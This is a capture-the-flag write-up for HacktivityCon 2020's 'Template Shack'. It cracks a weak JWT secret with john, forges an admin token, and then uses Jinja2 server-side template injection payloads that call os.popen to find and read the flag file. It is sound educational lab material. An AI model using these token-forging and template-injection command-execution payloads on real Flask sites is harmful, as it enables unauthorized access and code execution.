Tags: jinja web jinja2 template-injection hacktivityconctf2020
Rating:
## Write up Template Shack
On the website we got a session-token and token that seems to be a jwt:
to get the secret we have to bruteforce the jwt, using john:
``echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.9SvIFMTsXt2gYNRF9I0ZhRhLQViY-MN7VaUutz9NA9Y" > jwt.hash``
To crack it:
``john jwt.hash -w=/usr/share/wordlists/rockyou.txt``
we get the secret as ``supersecret``
data:image/s3,"s3://crabby-images/544cf/544cf749fcc0f81e98e7c1fdda554460e20463df" alt="b4120f50ec01db439c6b1a0b2e17f8f3.png"
Decoding it:
data:image/s3,"s3://crabby-images/eacf3/eacf3c34aaa54a2645b9026ed8239bfa35f03c58" alt="677ce90eb3b8a89b93597677284bfdb0.png"
Now it's time to create a new token and sign it using the jwt_tool:
data:image/s3,"s3://crabby-images/e64ef/e64efea50d237df92ca8fb6c822d118e6ae43ec2" alt="e569e3c4d816e07a1b772e43a10ec4dd.png"
Using the tool to change guest for admin and sign it with the key:
data:image/s3,"s3://crabby-images/f2334/f2334702df89fb653d25d840794fe9f8dba177ce" alt="67ab31baeab4bf5345583493879465ab.png"
Our brand new jwt token with "admin" ``eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ykqid4LTnSPZtoFb11H+/2q+Vo32g4mLpkEcajK0H7I``
changing the token with this value gives us access to de admin panel:
data:image/s3,"s3://crabby-images/ba473/ba47367c3b5ab2cd5620b93968a7a0ce1cb05586" alt="1b97e21508f7ed17c791a153c436aacb.png"
I noticed that inside the admin template when a webpage doesn't exists it renders the endpoint on the 404, for example if I look for /admin/abt.html I got:
data:image/s3,"s3://crabby-images/07292/07292deae1d7d3c75a7fc3cc259fdc9d5e7c52c7" alt="d26a25bb83b73a84cb913901c4a06eaa.png"
This added to the name of the challenge made me think about template injection and bingo:
data:image/s3,"s3://crabby-images/eaa4f/eaa4f77c1cfe704109e4020f05ab3b1f64b84d22" alt="0ada9bdc9cc0f7636be6951b93d8ee7f.png"
So there is probably python running on the backgroung as this is a feature of flask jinja so let's find it out with ``{{ [].__class__.__base__.__subclasses__() }}``:
data:image/s3,"s3://crabby-images/21c33/21c33a4445e26a2f133e1df79dab302159fc9167" alt="1a41206868d5c17e10b3a8cf7044e622.png"
So now we just need to use the os library to read the flag:
``{{ request.application.__globals__.__builtins__}}}`` we can access the builtins so we will try to import the os with ``{ request.application.__globals__.__builtins__.__import__('os')}}``
data:image/s3,"s3://crabby-images/dad8a/dad8a5d6c360bf45142d362bf2b595eb590a7b7c" alt="9ea482a3850c3e64e933167c48b47b7f.png"
Its time to find the flag.txt ``{{ request.application.__globals__.__builtins__.__import__('os').popen('find / -name flag.txt').read()}}``
data:image/s3,"s3://crabby-images/c44ac/c44acf0c1fbc8b459e566182d764644c21726ae6" alt="c1c780927a45638edfbabb212872c8e8.png"
and finally cat the flag ``{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /home/user/flag.txt').read()}}``
data:image/s3,"s3://crabby-images/1862f/1862f5cde5ba9d04bbb311c70a6efabb8d231438" alt="9c8b0fc698ca5267541f7672ddb4da4c.png"
And that was all!